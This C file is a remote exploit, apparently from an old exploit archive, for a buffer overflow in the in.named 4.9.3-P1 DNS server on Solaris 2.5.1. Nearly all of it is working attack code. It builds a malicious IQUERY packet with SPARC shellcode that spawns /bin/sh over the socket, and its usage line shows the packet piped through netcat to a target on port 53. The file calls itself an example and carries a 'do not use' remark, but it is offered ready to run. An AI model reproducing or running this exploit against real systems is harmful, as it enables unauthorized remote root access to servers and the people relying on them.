/* private */
/*
  remote in.named 4.9.3-P1 exploit Example for Solaris 2.5.1 (do not use!.)
  4-May-1998 by stran9er
  info about how to make dns request packet from:
    bof-test.c written solely by Joshua J. Drake (jdrake@pulsar.net) 
  bug in: /in.named/ns_req.c:ns_req()
  shellcode based/riped on/from dropstatd-sol24.c_by_unknown_author
*/

#define FRAME1_UPLEN   0x200
#define SHELLC_DOWNSET 0x100
#define BUF_LEN        (FRAME1_UPLEN-16)
#define FRAME2_LEN     sizeof(frame2)
#define BUF_BEGIN      0xeffff730

#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <sys/types.h>
#include <netinet/in.h>
#include <unistd.h>
#include <arpa/nameser.h>

#define SPARC_JMP       0x10800000
#define SPARC_CALL      0x40000000

char shellc[]=
  "\x90\x1A\xC0\x0F" /** xor  %o3, %o7, %o0 */
  "\x90\x02\x20\x08" /** add  %o0, 8, %o0 */
  "\x92\x02\x20\x0F" /** add  %o0, 0xf, %o1 */
  "\xD0\x23\xBF\xF8" /** st  %o0, [ %sp + -8 ] */
  "\xD6\x23\xBF\xFC" /** st  %o3, [ %sp + -4 ] */
  "\xda\x02\x20\x78" /*+ ld  [ %o0 + 0x78 ], %o5 */ /* !! */
  "\x90\x10\x00\x0d" /*+ mov  %o5, %o0 */
  "\x92\x10\x20\x04" /*+ mov F_SETFL, %o1 */
  "\x94\x10\x20\x02" /*+ mov 2, %o2  !remove damn FNDELAY mode.. */
  "\x82\x10\x20\x3e" /*+ mov 62, %g1 !fcntl()*/
  "\x91\xd0\x20\x08" /*+ ta 8 */
  "\x98\x1A\xC0\x0b" /** xor  %o3, %o3, %o4 */
  "\x82\x10\x20\x06" /** mov  6, %g1	! SYS_close */
  "\x90\x1A\xC0\x0c" /** xor  %o3, %o4, %o0 */
  "\x91\xd0\x20\x08" /*+ ta 8 */
  "\x80\xA3\x20\x08" /*+ cmp %o4, 8 */
  "\x12\xBF\xFF\xFD" /** bne  -3 */
  "\x98\x03\x20\x01" /** inc  %o4 */
  "\x98\x1A\xC0\x0b" /** xor  %o3, %o3, %o4 */
  "\x82\x10\x20\x29" /** 0x29, %g1	! SYS_dup */
  "\x90\x10\x00\x0d" /*+ mov  %o5, %o0 */
  "\x91\xd0\x20\x08" /*+ ta 8 */
  "\x80\xA3\x20\x02" /** cmp  %o4, 2 */
  "\x12\xBF\xFF\xFD" /** bne -3 */
  "\x98\x03\x20\x01" /** inc  %o4 */
  "\xD0\x03\xBF\xF8" /** ld  [ %sp + -8 ], %o0 */
  "\x92\x23\xA0\x08" /** sub  %sp, 8, %o1 */
  "\x94\x23\xA0\x04" /** sub  %sp, 4, %o2 */
  "\x82\x10\x20\x3b" /** mov  0x3b, %g1	! SYS_execve */
  "\x91\xd0\x20\x08" /*+ ta 8 */
  "\x82\x10\x20\x01" /*+ mov 1, %g1 	! _exit */
  "\x91\xd0\x20\x08" /*+ ta 8 */
  "\x96\x1A\xC0\x0b\x96\x1A\xC0\x0b\x96\x1A\xC0\x0b\x96\x1A\xC0\x0b" /* +128 */
  "\x96\x1A\xC0\x0b\x96\x1A\xC0\x0b\x96\x1A\xC0\x0b\x96\x1A\xC0\x0b"
  "\x96\x1A\xC0\x0b\x96\x1A\xC0\x0b\x96\x1A\xC0\x0b\x96\x1A\xC0\x0b"
  "\x40\x00\x00\x02" /* call +2 */ /* entry point for sol2.5 */
  "\x01\x00\x00\x00" /*+ nop */
  "\x90\x10\x00\x0F" /*+ mov  %o7, %o0 */
  "\xda\x02\x20\xA4" /*+ ld  [ %o0 + 0xA4 ], %o5 */ /* !! */
  "\xda\x22\x20\xAC" /*+ st  %o5, [ %o0 + 0xAC ] */ /* !! */
  "\x10\x80\x00\x03" /*+ b +3 */
  "\x96\x1A\xC0\x0b" /*+ xor  %o3, %o3, %o3 */
  "\x96\x1A\xC0\x0b" /*+ will be damaged */
  "\x96\x1A\xC0\x0b" /** xor  %o3, %o3, %o3 */ /* entry point for sol2.5.1 */
  "\x96\x1A\xC0\x0b" /** xor  %o3, %o3, %o3 */
  //"\x00\x00\x00\x00" /*debug trap*/
  "\x9C\x23\xA1\x80" /** sub  %sp, 0x180, %sp */
  "\x7F\xFF\xFF\xC9" /*+ call -55 */
  "\x96\x1A\xC0\x0b" /** xor  %o3, %o3, %o3 */
  "/bin"
  "/sh\x00";
/** <- original code */
/*+ <- my modifications */

unsigned long int frame2[] = {
  0xefffe000,0x00000000,0x00000001,0xefffe000,
  0x00000000,0x00000000,0x00000000,0x00000000,
  0xefffe000,0xefffe000,0xefffe000,0xefffe000,
  0xefffe000,0xffffffff,0xefffe000,0x12345678 };

typedef struct
  {
    unsigned short int	r_class;		/* class number */
    unsigned short int	r_type;			/* type number */
    unsigned long int	r_ttl;			/* time to live */
    unsigned short int	r_size;			/* size of data area */
    char r_data[FRAME1_UPLEN+FRAME2_LEN-2-2-4-2];	/* pointer to data */
  }
rrecord;

main(int argc, char **argv)
{
  HEADER *h;
  rrecord *rr;
  char db[sizeof(HEADER)+sizeof(rrecord)+2];
  char *buf, *ptr;
  unsigned long int *lptr, *lptrf;
  unsigned char cat[]="no";
  short int *buflen;
  unsigned long stack = BUF_BEGIN, offset;
  int o,b,c,t;

  fprintf (stderr, "* Solaris 2.5.1 in.named 4.9.3-P1 exploit example by stran9er \n");
  if ( (argc<2) )
    {
      fprintf (stderr, "usage: (%s 0 ;cat) | netcat target 53\n",argv[0]);
      exit(1);
    }
  offset=atoi(argv[1]);
  stack+=offset;
  fprintf(stderr,"\nAddress: 0x%x Offset: %d\n",stack, offset);
  buf=db;
  memset(buf, 0, sizeof(db));
  buflen=(short int *)buf;
  *buflen=htons(sizeof(db)-2);
  h = (HEADER *)(buf+2);
  h->id = rand() & 0xfff;
  h->opcode = IQUERY;
  h->ancount = htons(1);
  ptr=(char *)h+sizeof(HEADER);
  rr=(rrecord *)((char *)h+sizeof(HEADER)+1);
  rr->r_class= htons(C_IN);
  rr->r_type = htons(T_A);
  rr->r_size = htons(sizeof(rr->r_data)-1);
  lptr = (unsigned long int *)(ptr+FRAME1_UPLEN-BUF_LEN);
#define CALL_OFFSET 52+(FRAME1_UPLEN-SHELLC_DOWNSET-16)/4
  for(c=0;c<(BUF_LEN/4);c++)
    *lptr++ = htonl(SPARC_CALL+CALL_OFFSET-c);
  for(c=0;c<((sizeof(frame2)/4));c++)
    {
      if (frame2[c]==0x12345678) frame2[c]=stack;
      *lptr++ = htonl(frame2[c]);
    }
  lptr = (unsigned long int *)(ptr+FRAME1_UPLEN-SHELLC_DOWNSET);
  memcpy((char *)lptr,shellc,sizeof(shellc)-1);
  /*** configure Solaris 2.5 entry points for zero offset ***/
  lptr = (unsigned long int *)(ptr+FRAME1_UPLEN-SHELLC_DOWNSET+128-356);
  *lptr = htonl(SPARC_CALL+(356/4)); /* sol2.5 restarted */
  lptr = (unsigned long int *)(ptr+FRAME1_UPLEN-SHELLC_DOWNSET+128-308);
  *lptr = htonl(SPARC_CALL+(308/4)); /* sol2.5 first */
  write(1,buf,sizeof(db));
}
/*                    www.hack.co.za              [2000]*/